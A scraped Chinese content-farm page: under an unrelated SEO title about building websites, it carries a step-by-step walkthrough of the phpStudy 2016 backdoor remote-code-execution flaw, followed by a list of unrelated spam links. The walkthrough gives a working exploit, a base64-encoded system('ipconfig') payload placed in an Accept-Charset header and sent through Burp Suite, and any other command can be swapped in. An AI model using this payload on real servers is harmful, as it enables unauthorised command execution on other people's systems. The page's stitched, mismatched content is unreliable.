当前位置: 首页 > news >正文

虚拟主机怎么设计网站网站建设市场

虚拟主机怎么设计网站,网站建设市场,多用户商城源码下载,各大网站地区是怎样和做的文章目录 漏洞描述漏洞验证 漏洞描述 PHPStudyRCE(Remote Code Execution),也称为phpstudy_backdoor漏洞,是指PHPStudy软件中存在的一个远程代码执行漏洞。 漏洞验证 打开phpstudy2016,用bp自带的浏览器访问www目录下…

文章目录

  • 漏洞描述
  • 漏洞验证

漏洞描述

PHPStudyRCE(Remote Code Execution),也称为phpstudy_backdoor漏洞,是指PHPStudy软件中存在的一个远程代码执行漏洞。

漏洞验证

打开phpstudy2016,用bp自带的浏览器访问www目录下的phpinfo.php文件,访问后结果如下:
在这里插入图片描述

然后在bp中将抓到的数据包发送到repeater模块:

在这里插入图片描述

将system(‘ipconfig’);命令做base64编码:

system('ipconfig');

编码后

c3lzdGVtKCdpcGNvbmZpZycpOw==

在这里插入图片描述

然后在repeater模块添加Accept-Charset: 字段,将base64编码放入:

Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==

注意Accept-Encoding字段中gzip和deflate之间不能有空格!

在这里插入图片描述

去掉空格后点击send发送,ipconfig命令被执行:

在这里插入图片描述

http://www.yayakq.cn/news/206271/

相关文章:

  • 嘉定网站开发wordpress 本地服务器配置
  • 营销型企业网站建设的基本原则是本地网站怎么建设
  • 棋牌网站开发免费网站在线观看人数在哪
  • 衡阳网站排名分销小程序开发研发公司
  • 虚拟网站建设步骤丁香花在线电影小说观看
  • 重庆网领网站建设公司杭州九鸿科技网站开发
  • 南京公司网站模板建站都江堰做网站
  • 网站版权模板兰州seo推广
  • 手机网站域名m.做移动网站优
  • 公司网站策划上海的广告公司有哪些
  • 遂宁商城网站建设报价网站的基本结构
  • 中盛腾龙建设工程有限公司网站电子商务网站建设a卷
  • 宁波网站建设 网络服务用什么建设网站
  • 毕设做网站怎么弄代码设计网页设计师用什么软件
  • mstsc做网站silverlight 做的网站
  • 做网站是如果盈利的网站建设教程学习
  • 国内做受网站怎么建公众号申请
  • 邢台做网站的公司哪家好?装饰公司网站开发
  • 提供手机网站开发企业信息公示管理系统
  • 网站开发和游戏开发哪个难网站建设 xplogo
  • 上城网站建设远涛网站建设
  • 网站目录访问北京网站建设定制型报价
  • 好的做问卷调查的网站好建筑人工作网
  • 企业免费网站建设哪里比较好网页制作教程简明
  • 织梦大气婚纱影楼网站源码今天的湖北新闻
  • 重庆模板做网站做便民网站都需要哪些模块
  • 如何做旅游网站的旅行家网站后台字体安装
  • 网站活动策划方案房产网签是什么意思 网签的意义是什么
  • 企业网站建设有哪些什么是百度权重
  • 深圳东门步行街在哪个区seo关键词布局案例